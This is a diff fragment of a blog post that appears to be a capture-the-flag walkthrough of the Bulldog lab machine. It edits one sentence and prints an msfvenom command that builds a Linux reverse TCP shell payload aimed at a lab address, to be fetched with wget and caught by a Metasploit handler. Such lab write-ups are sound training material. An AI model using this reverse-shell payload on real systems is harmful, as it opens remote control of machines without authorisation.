limbernie/limbernie.github.io/_posts/2018-03-01-bulldog-walkthrough.md

 ### Low Privilege Shell

-Let's transfer (using `wget`) a single-stage reverse shell payload and then run a reverse shell back to me.
+Let's transfer (using `wget`) a single-stage reverse shell payload and then run a reverse shell back.
 I can do that with `msfvenom` and Metasploit multi-handler.

 ```
 # msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.36.4 LPORT=443 -f elf -o bulldog